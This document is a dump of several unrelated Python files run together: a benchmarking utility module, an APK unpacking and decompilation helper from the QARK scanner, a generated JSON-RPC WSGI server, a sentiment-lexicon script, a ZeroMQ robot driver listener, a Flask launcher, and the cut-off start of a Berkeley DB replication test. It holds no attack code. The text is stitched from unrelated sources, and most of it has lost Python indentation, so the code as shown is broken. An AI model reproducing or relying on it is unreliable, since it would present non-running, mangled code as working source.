def RunningOnWindows():
"""Returns True if PKB is running on Windows."""
return os.name == WINDOWS
def RunningOnDarwin():
"""Returns True if PKB is running on a Darwin OS machine."""
return os.name != WINDOWS and platform.system() == DARWIN
def ExecutableOnPath(executable_name):
"""Return True if the given executable can be found on the path."""
cmd = ['where'] if RunningOnWindows() else ['which']
cmd.append(executable_name)
shell_value = RunningOnWindows()
process = subprocess.Popen(cmd,
shell=shell_value,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
process.communicate()
if process.returncode:
return False
return True
def GenerateRandomWindowsPassword(password_length=PASSWORD_LENGTH):
"""Generates a password that meets Windows complexity requirements."""
# The special characters have to be recognized by the Azure CLI as
# special characters. This greatly limits the set of characters
# that we can safely use. See
# https://github.com/Azure/azure-xplat-cli/blob/master/lib/commands/arm/vm/vmOsProfile._js#L145
special_chars = '*!@#$%+='
password = [
random.choice(string.ascii_letters + string.digits + special_chars)
for _ in range(password_length - 4)]
# Ensure that the password contains at least one of each 4 required
# character types.
password.append(random.choice(string.ascii_lowercase))
password.append(random.choice(string.ascii_uppercase))
password.append(random.choice(string.digits))
password.append(random.choice(special_chars))
return ''.join(password)
def StartSimulatedMaintenance():
"""Initiates the simulated maintenance event."""
if FLAGS.simulate_maintenance:
_SIMULATE_MAINTENANCE_SEMAPHORE.release()
def SetupSimulatedMaintenance(vm):
"""Called ready VM for simulated maintenance."""
if FLAGS.simulate_maintenance:
def _SimulateMaintenance():
_SIMULATE_MAINTENANCE_SEMAPHORE.acquire()
time.sleep(FLAGS.simulate_maintenance_delay)
vm.SimulateMaintenanceEvent()
t = threading.Thread(target=_SimulateMaintenance)
t.daemon = True
t.start()
|
unpackAPK.py
|
from __future__ import absolute_import
'''Copyright 2015 LinkedIn Corp. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.'''
import zipfile
import os
from genericpath import isdir
import subprocess
import logging
import shlex
import threading
import re
import shutil
import time
from subprocess import Popen, PIPE, STDOUT
from collections import defaultdict
from multiprocessing import Process
from threading import Thread, Lock
from lib.progressbar import *
from lib import blessings
from modules.common import logger
from modules import report
from modules import common
from lib.pubsub import pub
lock = Lock()
progresswriter1 = common.Writer((0, common.term.height - 10))
progressbar1 = ProgressBar(widgets=['JD CORE ', Percentage(), Bar()], maxval=100, fd=progresswriter1)
progresswriter2 = common.Writer((0, common.term.height - 8))
progressbar2 = ProgressBar(widgets=['Procyon ', Percentage(), Bar()], maxval=100, fd=progresswriter2)
progresswriter3 = common.Writer((0, common.term.height - 6))
progressbar3 = ProgressBar(widgets=['CFR ', Percentage(), Bar()], maxval=100, fd=progresswriter3)
def unpack():
"""
APK to DEX
"""
logger.info('Unpacking %s', common.apkPath)
# Get the directory to unpack to
try:
dirname, extension = common.apkPath.rsplit(".", 1)
# workaround for cases where path may include whitespace
        file_temp = open(common.apkPath, 'rb')
        zf = zipfile.ZipFile(file_temp)
        logger.info('Zipfile: %s', zf)
        if not os.path.exists(dirname + "/"):
            os.makedirs(dirname + "/")
        zf.extractall(dirname + "/", zf.namelist())
        logger.info('Extracted APK to %s', dirname + '/')
common.pathToDEX = dirname + "/classes.dex"
if not os.path.exists(common.pathToDEX): # Some default/system APKs from Google don't have this file
logger.error("The classes.dex file was not found for this APK! Please select a different APK.")
raise Exception
common.pathToUnpackedAPK = dirname + '/'
return True
except Exception as e:
if not common.interactive_mode:
logger.error(common.args.apkpath + common.config.get('qarkhelper', 'NOT_A_VALID_APK'))
exit()
logger.error(common.config.get('qarkhelper', 'NOT_A_VALID_APK_INTERACTIVE'))
raise
def get_apk_info(pathToAPK):
package = defaultdict(list)
print "starting"
aapt = Popen(['aapt', 'dump', 'badging', pathToAPK], stdout=PIPE, stdin=PIPE, stderr=STDOUT, bufsize=1)
for line in aapt.stdout:
print line,
if line.startswith("package"):
package['application-name'] = line.split(" ")[1].split("'")[1]
package['application-version'] = line.split(" ")[3].split("'")[1]
if line.startswith("sdkVersion"):
package['application-sdkversion'] = line.split("'")[1]
if line.startswith("targetSdkVersion"):
package['application-targetSdkVersion'] = line.split("'")[1]
if line.startswith("application-label"):
package['application-label'] = line.split("'")[1]
if "application-debuggable" in line:
package['application-debuggable'] = True
if line.startswith("uses-permission"):
package['application-permissions'].append(line.split("'")[1])
return package
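# For reference, the parser above assumes `aapt dump badging` output lines
# shaped like the following (illustrative excerpt; exact fields vary per APK):
#
#   package: name='com.example.app' versionCode='1' versionName='1.0'
#   sdkVersion:'16'
#   targetSdkVersion:'23'
#   application-label:'Example'
#   uses-permission:'android.permission.INTERNET'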
def find_manifest_in_unpacked_apk(path, name):
"""
Finds manifest.xml from the unpacked APK
"""
pathFromAPK = path.rsplit(".", 1)[0]
common.sourceDirectory = pathFromAPK
logger.info('Finding %s in %s', name, pathFromAPK)
    common.logger.debug('%s %s', pathFromAPK, name)
for root, dirs, files in os.walk(pathFromAPK):
for file in files:
if name in file:
logger.info('%s found', name)
return os.path.join(root, name)
def grep_1(path, regex):
"""
wrapper around grep functionality
"""
regObj = re.compile(regex)
res = []
    for root, dirs, fnames in os.walk(path):
        for fname in fnames:
            if not fname.startswith("."):
                with open(root + "/" + fname, "r") as f:
                    data = f.read()
                    if re.search(regObj, data):
                        res.append(os.path.join(root, fname))
    return res
def decompile(path):
"""
    Converts the DEX to a JAR (containing class files), then decompiles the class files back to near-original Java source using 3 different decompilers, keeping the best available output for each file
"""
common.pathToDEX = path
pathToDex2jar = common.rootDir + "/lib/dex2jar/dex2jar.sh"
sp = subprocess.Popen([pathToDex2jar, common.pathToDEX], shell=False, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
output, error = sp.communicate()
common.pathToJar = common.pathToDEX.rsplit(".", 1)[0] + "_dex2jar.jar"
dirname, extension = common.pathToJar.rsplit(".", 1)
zf = zipfile.ZipFile(common.pathToJar)
# Total number of class files that need to be decompiled
total_files = len(zf.namelist())
report.write("totalfiles", total_files)
common.count = len([s for s in zf.namelist() if ((".class" in s) and ("$" not in s))])
pub.subscribe(decompiler_update, 'decompile')
thread0 = Process(name='clear', target=clear, args=())
    thread1 = Process(name='jdcore', target=jdcore, args=(zf.filename, dirname))
    thread2 = Process(name='cfr', target=cfr, args=(zf.filename, dirname))
    thread3 = Process(name='procyon', target=procyon, args=(zf.filename, dirname))
thread0.start()
thread0.join()
progressbar1.start()
progressbar2.start()
progressbar3.start()
thread1.start()
thread2.start()
thread3.start()
thread1.join(0)
thread2.join(0)
thread3.join(0)
with common.term.cbreak():
val = None
while val not in (u'c', u'C'):
with common.term.location(0, common.term.height - 3):
print "Decompilation may hang/take too long (usually happens when the source is obfuscated)."
print "At any time," + common.term.bold_underline_red_on_white(
'Press C to continue') + " and QARK will attempt to run SCA on whatever was decompiled."
val = common.term.inkey(timeout=1)
if not (thread1.is_alive() or thread2.is_alive() or thread3.is_alive()):
break
if thread1.is_alive():
thread1.terminate()
if thread2.is_alive():
thread2.terminate()
if thread3.is_alive():
thread3.terminate()
# Go back to the bottom of the screen
with common.term.location(0, common.term.height):
print ""
g1 = grep_1(dirname, "// Byte code:")
g2 = grep_1(dirname + "1", "// This method has failed to decompile.")
g3 = grep_1(dirname + "2", "// This method could not be decompiled.")
# print list(set(g1) - set(g2))
logger.info("Trying to improve accuracy of the decompiled files")
restored = 0
try:
for filename in g1:
relative_filename = str(filename).split(dirname)[1]
if any(relative_filename in s for s in g2):
if any(relative_filename in s for s in g3):
logger.debug("Failed to reconstruct: " + relative_filename)
else:
shutil.copy(dirname + "2" + relative_filename, filename)
restored = restored + 1
else:
shutil.copy(dirname + "1" + relative_filename, filename)
restored = restored + 1
except Exception as e:
print e.message
report.write("restorestats", "Restored " + str(restored) + " file(s) out of " + str(len(g1)) + " corrupt file(s)")
logger.info("Restored " + str(restored) + " file(s) out of " + str(len(g1)) + " corrupt file(s)")
logger.debug("Deleting redundant decompiled files")
try:
shutil.rmtree(dirname + "1")
logger.debug("Deleted " + dirname + "1")
shutil.rmtree(dirname + "2")
logger.debug("Deleted " + dirname + "2")
except Exception as e:
logger.debug("Unable to delete redundant decompiled files (no impact on scan results): " + str(e))
def decompiler_update(cfr=None, jdcore=None, procyon=None):
lock.acquire()
if cfr is not None:
if cfr <= 100:
progressbar3.update(cfr)
if jdcore is not None:
if jdcore <= 100:
progressbar1.update(jdcore)
if procyon is not None:
if procyon <= 100:
progressbar2.update(procyon)
lock.release()
def jdcore(path, dirname):
"""
calls the jdcore decompiler from command line
"""
process = subprocess.Popen(["java", "-jar", common.rootDir + "/lib/jd-core-java-1.2.jar", path, dirname],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def cfr(path, dirname):
"""
calls the cfr decompiler from command line
"""
process = subprocess.Popen(
["java", "-jar", common.rootDir + "/lib/cfr_0_115.jar", path, "--outputdir", dirname + "1"],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
try:
while True:
line = process.stdout.readline()
if not line:
break
if "Processing" in line:
common.counter1 = common.counter1 + 1
pub.sendMessage('decompile', cfr=round(common.counter1 * 100 / common.count))
pub.sendMessage('decompile', jdcore=round(common.counter1 * 100 / common.count))
except Exception as e:
logger.debug(e.message)
def procyon(path, dirname):
"""
calls the procyon decompiler from command line
"""
process = subprocess.Popen(
["java", "-jar", common.rootDir + "/lib/procyon/procyon-decompiler-0.5.30.jar", path, "-o ", dirname + "2"],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
try:
while True:
line = process.stdout.readline()
if not line:
break
if "Decompiling" in line:
common.counter2 = common.counter2 + 1
pub.sendMessage('decompile', procyon=round(common.counter2 * 100 / common.count))
except Exception as e:
logger.debug(e.message)
def clear():
"""
Making space for progressbars
"""
with common.term.location():
logger.info(
'Please wait while QARK tries to decompile the code back to source using multiple decompilers. This may take a while.')
print("\n" * 11)
|
submoduletestServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from submoduletest.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-server-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'submoduletest'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from submoduletest.submoduletestImpl import submoduletest # noqa @IgnorePep8
impl_submoduletest = submoduletest(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
newerr.data = e.message
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'submoduletest'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_submoduletest.foo,
name='submoduletest.foo',
types=[int])
self.method_authentication['submoduletest.foo'] = 'required' # noqa
self.rpc_service.add(impl_submoduletest.status,
name='submoduletest.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'submoduletest ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
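# Usage sketch (hypothetical): run the server in a child process so that
# stop_server() can later be called from the same interpreter:
#
#   port = start_server(newprocess=True)  # returns the system-assigned port
#   ... issue JSON-RPC POSTs against http://localhost:<port>/ ...
#   stop_server()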
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
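# For reference, process_async_cli expects the input file to hold a single
# JSON-RPC request; a minimal (hypothetical) example:
#   {"method": "Module.method_name", "params": [...]}
# Missing "id" and "version" fields are filled in above, and an optional
# "context" dict is copied into the call context.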
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
make_adj_lexicons.py
|
import time
import random
import constants
import seeds
from socialsent import util
from socialsent import polarity_induction_methods
from socialsent.historical import vocab
from multiprocessing import Queue, Process
from Queue import Empty
from socialsent.representations.representation_factory import create_representation
"""
Makes historical sentiment lexicons for all adjectives.
(Only adjectives that occurred > 500 times are contained within the embeddings).
"""
def worker(proc_num, queue):
while True:
time.sleep(random.random()*10)
try:
year = queue.get(block=False)
except Empty:
print proc_num, "Finished"
return
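        # queue.get(block=False) raises Empty once the shared year queue is
        # drained, so each worker exits via the return above; the random
        # sleep staggers the workers' polling.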
positive_seeds, negative_seeds = seeds.adj_seeds()
year = str(year)
print proc_num, "On year", year
words = vocab.pos_words(year, "jj")
embed = create_representation("SVD", constants.COHA_EMBEDDINGS + year)
embed_words = set(embed.iw)
words = words.intersection(embed_words)
polarities = polarity_induction_methods.bootstrap(
embed.get_subembed(words.union(positive_seeds).union(negative_seeds)),
positive_seeds, negative_seeds,
score_method=polarity_induction_methods.random_walk,
num_boots=50, n_procs=20, return_all=True,
beta=0.9, nn=25)
util.write_pickle(polarities, constants.POLARITIES + year + '-coha-adj-boot.pkl')
def main():
num_procs = 6
queue = Queue()
for year in range(1850, 2010, 10):
queue.put(year)
procs = [Process(target=worker, args=[i, queue]) for i in range(num_procs)]
for p in procs:
p.start()
for p in procs:
p.join()
if __name__ == "__main__":
main()
|
Driver_socket.py
|
#
# Created on Wed Sep 22 2021
# Author: Owen Yip
# Mail: me@owenyip.com
#
# Socket number:
# RpLidar is 5450, IMU is 5451, Driver is 5452
#
import numpy as np
import os,sys
pwd = os.path.abspath(__file__)
father_path = os.path.abspath(os.path.dirname(pwd) + os.path.sep + "..")
sys.path.append(father_path)
import time
import threading
import zmq
import json
from Driver import ControlOdometryDriver as cd
# from Network import FrontFollowingNetwork as FFL
CD = cd.ControlDriver(record_mode=False, left_right=0)
thread_cd = threading.Thread(target=CD.control_part, args=())
def send_control(control):
CD.speed = control['speed']
CD.radius = control['radius']
CD.omega = control['omega']
init_control = {
"speed": 0,
"radius": 0,
"omega": 0
}
send_control(init_control)
thread_cd.start()
context = zmq.Context()
socket = context.socket(zmq.SUB)
socket.connect("tcp://127.0.0.1:5454")
topicfilter = "DRIVER_RECV"
socket.setsockopt_string(zmq.SUBSCRIBE, topicfilter)
while True:
# Wait for next request from client
message = socket.recv_string()
if message:
message = message.replace(topicfilter, "")
control = json.loads(message)
if len(control) > 0:
send_control(control)
print("Received request: %s" % control)
# Do some 'work'
time.sleep(0)
# Send reply back to client
# socket.send(b"World")
|
run.py
|
import argparse
from threading import Thread, Event
from app.acceptor import app
from app.rest_api import api, configure_rest_api
from app.acceptor_configuration.configuration_factory import ConfigurationFactory
from app.controllers.implementations.MessageHolder import MessageHolder
from app.controllers.implementations.Mediator import Mediator
from controllers.implementations.ErrorQueuePusher import ErrorQueuePusher
from controllers.implementations.ProcessorQueuePusher import ProcessorQueuePusher
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--environment', type=str, help="docker/dev", required=True)
return parser.parse_args()
if __name__ == '__main__':
event = Event()
message_holder = MessageHolder(event)
args = parse_args()
configuration = ConfigurationFactory.createConfiguration(args.environment)
configure_rest_api(api, configuration, message_holder)
_kwargs = {'host': configuration.host,
'port': configuration.port,
'debug': configuration.debug,
'use_debugger': configuration.use_debugger,
'use_reloader': configuration.use_reloader}
app_thread = Thread(target=app.run, name='app_thread', kwargs=_kwargs)
processor_queue_pusher = ProcessorQueuePusher(queue_server=configuration.queueServer,
queue_port=configuration.queuePort,
queue_name=configuration.processorQueueName)
error_queue_pusher = ErrorQueuePusher(queue_server=configuration.queueServer, queue_port=configuration.queuePort,
queue_name=configuration.errorsQueueName)
mediator = Mediator(event, message_holder, processor_queue_pusher, error_queue_pusher)
mediator_thread = Thread(target=mediator.start, name='mediator_thread')
#app_thread.run()
    mediator_thread.start()  # todo: confirm whether start() or run() is the correct choice here
app_thread.run()
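    # Note on the todo above: Thread.start() spawns a new thread, whereas
    # Thread.run() executes the target in the *calling* thread. Calling
    # app_thread.run() here therefore blocks the main thread inside Flask's
    # loop, which only works because mediator_thread was started first.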
# app.run(
# host=acceptor_configuration.host,
# port=acceptor_configuration.port,
# debug=acceptor_configuration.debug,
# use_debugger=acceptor_configuration.use_debugger,
# use_reloader=acceptor_configuration.use_reloader)
# message_holder = MessageHolder()
# mediator = Mediator()
print('end')
|
test_replication.py
|
"""TestCases for distributed transactions.
"""
import os
import time
import unittest
from test_all import db, test_support, have_threads, verbose, \
get_new_environment_path, get_new_database_path
#----------------------------------------------------------------------
class DBReplication(unittest.TestCase) :
def setUp(self) :
self.homeDirMaster = get_new_environment_path()
self.homeDirClient = get_new_environment_path()
self.dbenvMaster = db.DBEnv()
self.dbenvClient = db.DBEnv()
# Must use "DB_THREAD" because the Replication Manager will
# be executed in other threads but will use the same environment.
# http://forums.oracle.com/forums/thread.jspa?threadID=645788&tstart=0
self.dbenvMaster.open(self.homeDirMaster, db.DB_CREATE | db.DB_INIT_TXN
| db.DB_INIT_LOG | db.DB_INIT_MPOOL | db.DB_INIT_LOCK |
db.DB_INIT_REP | db.DB_RECOVER | db.DB_THREAD, 0666)
self.dbenvClient.open(self.homeDirClient, db.DB_CREATE | db.DB_INIT_TXN
